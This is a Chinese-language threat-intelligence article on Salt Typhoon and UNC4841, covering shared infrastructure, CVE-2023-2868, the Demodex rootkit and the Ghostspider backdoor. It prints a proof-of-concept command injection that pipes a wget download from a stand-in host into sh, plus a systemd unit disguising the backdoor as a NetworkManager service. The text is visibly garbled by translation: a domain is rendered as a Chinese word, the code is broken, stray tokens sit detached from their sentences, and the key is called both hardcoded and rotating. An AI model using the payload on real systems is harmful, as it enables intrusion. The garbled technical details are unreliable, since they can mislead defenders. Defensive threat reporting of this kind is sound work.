网络安全研究人员在 2024 年最后几个月开始追踪一项针对企业网络的复杂活动。
此次行动背后的威胁行为者(俗称“盐台风”和“UNC4841”)利用重叠的基础设施和共享策略来最大限度地提高隐蔽性和持久性。
最初的渗透是通过利用面向公众的服务器中未修补的远程代码执行漏洞来实现的,然后部署定制的后门。
受影响的组织报告了异常的 DNS 查询和无法解释的出站 HTTPS 流量,例如 pulseathermakf[.]com 和红外线[.]com,后来归因于 Salt Typhoon 的命令和控制 (C2) 网络。
Silent Push 分析师指出,对手的感染媒介通常始于利用企业电子邮件网关中的零日漏洞。
在一次记录在案的事件中,UNC4841利用 Barracuda 电子邮件安全网关设备中的 CVE-2023-2868 建立初始访问权限。
利用后,攻击者上传了一个名为 Demodex 的定制 rootkit,这有助于内核级持久性和规避基于主机的检测机制。
大约在同一时间,Salt Typhoon 部署了两个额外的后门——Snappybee 和 Ghostspider——每个后门都旨在通过标准端口进行通信并使用随机 HTTP 标头来避免基于签名的检测,从而融入合法的流量模式。
当域名注册记录显示共享电子邮件注册人和与胡言乱语的 ProtonMail 地址相关的 SOA mbox 条目时,Silent Push 研究人员确定了这两个群体的融合。
这种基础设施重叠表明两个 APT 集群之间存在协调努力或资源共享。
通过将 WHOIS 数据与 DNS A 记录查找相关联,分析师发现了与这两个威胁行为者相关的超过 45 个以前未报告的域,从而扩展了主动防御措施的已知指标集。
感染和持久性机制
感染链始于利用易受攻击的软件模块的精心设计的 HTTP 请求。Silent Push 提供的概念验证片段说明了该漏洞的交付有效负载:-
import requests
exploit_url = "https://victim.example.com/api/exec?cmd="
payload = "wget http://malicious.server/ghostspider.sh -O- | sh"
response = requests. Get(exploit_url + payload)
print("Exploit delivered, status:", response.status_code)成功利用后,Ghostspider 后门脚本会以随机名称作为系统服务安装。
在受感染的主机上发现的服务单元文件类似于:
[Unit]
Description=NetworkManager Service
After=network.target
[Service]
Type=simple
ExecStart=/usr/bin/ghostspider --config /etc/ghostspider.conf
[Install]
WantedBy=multi-user.target这种技术确保在启动时自动执行,同时包含加密的 C2 端点和睡眠定时器来限制网络信标。/etc/ghostspider.conf
为了进一步逃避检测,攻击者实施了一种双层持久性策略:首先通过服务单元,然后通过 cron 作业,该作业会监控并在终止时重新启动后门。
Silent Push 分析师从内存中提取解密例程,揭示了应用于配置文件和网络流量有效负载的轻量级 XOR 密码。
密码密钥是硬编码的,但每 120 小时动态轮换一次,从而阻止了简单的静态分析。0x4F
这些感染和持久性策略的无缝集成凸显了 Salt Typhoon 和 UNC4841 的先进功能。
敦促组织审核已知恶意域的 DNS 和 WHOIS 遥测数据,并部署基于行为的检测以识别异常进程启动和加密的 C2 流量。
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。
